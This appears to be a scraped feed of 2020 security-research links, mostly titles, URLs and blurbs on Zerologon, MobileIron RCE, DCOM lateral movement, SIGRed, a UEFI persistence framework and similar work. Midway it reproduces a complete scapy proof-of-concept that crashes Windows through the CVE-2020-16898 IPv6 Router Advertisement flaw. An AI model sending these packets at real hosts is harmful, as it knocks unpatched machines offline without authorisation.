Unauthenticated RCE on MobileIron MDM
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html?m=1
https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html?m=1
Orange Tsai
How I Hacked Facebook Again! Unauthenticated RCE on MobileIron MDM
[ 繁體中文版本 | English Version ] Hi, it’s a long time since my last article. This new post is about my research this March, which talks about how I found vulnerabilities on a leading Mobile Device Mana
Zerologon: unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472)
https://www.secura.com/pathtoimg.php?id=2055
https://www.secura.com/pathtoimg.php?id=2055
I Like to Move It: Windows Lateral Movement Part 2 – DCOM
https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/
https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-2-dcom/
MDSec
I Like to Move It: Windows Lateral Movement Part 2 - DCOM - MDSec
Overview In part 1 of this series, we discussed lateral movement using WMI event subscriptions. During this post we will discuss another of my “go to” techniques for lateral movement,...
A different way of abusing Zerologon (CVE-2020-1472)
https://dirkjanm.io/a-different-way-of-abusing-zerologon/
https://dirkjanm.io/a-different-way-of-abusing-zerologon/
dirkjanm.io
A different way of abusing Zerologon (CVE-2020-1472)
In August 2020, Microsoft patched CVE-2020-1472 aka Zerologon. This is in my opinion one of the most critical Active Directory vulnerabilities of the past few years, since it allows for instant escalation to Domain Admin without credentials. The most straightforward…
#Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS
https://research.checkpoint.com/2020/instagram_rce-code-execution-vulnerability-in-instagram-app-for-android-and-ios/
https://research.checkpoint.com/2020/instagram_rce-code-execution-vulnerability-in-instagram-app-for-android-and-ios/
Check Point Research
#Instagram_RCE: Code Execution Vulnerability in Instagram App for Android and iOS - Check Point Research
Research by: Gal Elbaz Background Instagram, with over 100+ million photos uploaded every day, is one of the most popular social media platforms. For that reason, we decided to audit the security of the Instagram app for both Android and iOS operating systems.…
Exploiting SIGRed (CVE-2020–1350) on Windows Server 2012/2016/2019
https://medium.com/@datafarm.cybersecurity/exploiting-sigred-cve-2020-1350-on-windows-server-2012-2016-2019-80dd88594228
https://medium.com/@datafarm.cybersecurity/exploiting-sigred-cve-2020-1350-on-windows-server-2012-2016-2019-80dd88594228
Medium
Exploiting SIGRed (CVE-2020–1350) on Windows Server 2012/2016/2019
by Worawit Wangwarunyoo , DATAFARM Research Team, Datafarm Company Limited
GHunt is an OSINT tool to extract a lot of informations of someone's Google Account email.
https://github.com/mxrch/ghunt
https://github.com/mxrch/ghunt
GitHub
GitHub - mxrch/GHunt: 🕵️♂️ Offensive Google framework.
🕵️♂️ Offensive Google framework. Contribute to mxrch/GHunt development by creating an account on GitHub.
Bypassing Android MDM Using Electromagnetic Fault Injection By A Gas Lighter For $1.5
https://payatu.com/blog/arun/bypassing-android-mdm-using-electromagnetic-fault-injection-by-a-gas-lighter-for-$1.5$
https://payatu.com/blog/arun/bypassing-android-mdm-using-electromagnetic-fault-injection-by-a-gas-lighter-for-$1.5$
SpeedPwning VMware Workstation
https://www.synacktiv.com/sites/default/files/2020-10/Speedpwning_VMware_Workstation.pdf
https://www.synacktiv.com/sites/default/files/2020-10/Speedpwning_VMware_Workstation.pdf
Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?
https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower
https://www.cyberark.com/resources/threat-research-blog/anti-virus-vulnerabilities-who-s-guarding-the-watch-tower
Cyberark
Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?
This blog entry is a special anti-malware edition showcasing how the most common bugs security products suffer from can allow a standard user to escalate into a privileged user. What we found...
Release the Kraken: Fileless APT attack abuses Windows Error Reporting service
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
Bypassing Trend Micro Web Threat Protection via Punycode
https://www.inputzero.io/2020/08/bypass-trend-micro-web-threat-protection.html
https://www.inputzero.io/2020/08/bypass-trend-micro-web-threat-protection.html
www.inputzero.io
Bypassing Trend Micro Web Threat Protection via Punycode
TrendMicro Web Threat Protection - Bypass
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898)
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
There’s A Hole In Your SoC: Glitching The MediaTek BootROM
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
https://research.nccgroup.com/2020/10/15/theres-a-hole-in-your-soc-glitching-the-mediatek-bootrom/
Nccgroup
Cyber Security Research
Cutting-edge cyber security research from NCC Group. Find public reports, technical advisories, analyses, & other novel insights from our global experts.
Forwarded from Noise Security Bit (AM)
CVE-2020-16898 – Exploiting RCE "Bad Neighbor" vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html
https://blog.pi3.com.pl/?p=780
BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
from scapy.all import *
v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"
p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4
c = ICMPv6NDOptEFA();
e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]
pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e
p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
IPv6ExtHdrFragment()/pkt
l=fragment6(p_test_frag, 200)
for p in l:
send(p)
Quarkslab
Beware the Bad Neighbor: Analysis and PoC of the Windows IPv6 Router Advertisement Vulnerability (CVE-2020-16898) - Quarkslab's…
This blog post analyzes the vulnerability known as "Bad Neighbor" or CVE-2020-16898, a stack-based buffer overflow in the IPv6 stack of Windows, which can be remotely triggered by means of a malformed Router Advertisement packet.
Introducing MIDNIGHTTRAIN - A Covert Stage-3 Persistence Framework weaponizing UEFI variables
https://slaeryan.github.io/posts/midnighttrain.html
https://slaeryan.github.io/posts/midnighttrain.html
Let’s build a high-performance fuzzer with GPUs!
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
https://blog.trailofbits.com/2020/10/22/lets-build-a-high-performance-fuzzer-with-gpus/
The Trail of Bits Blog
Let’s build a high-performance fuzzer with GPUs!
TL;DR: Can we use GPUs to get 10x performance/dollar when fuzzing embedded software in the cloud? Based on our preliminary work, we think the answer is yes! Fuzzing is a software testing technique that supplies programs with many randomized inputs in an attempt…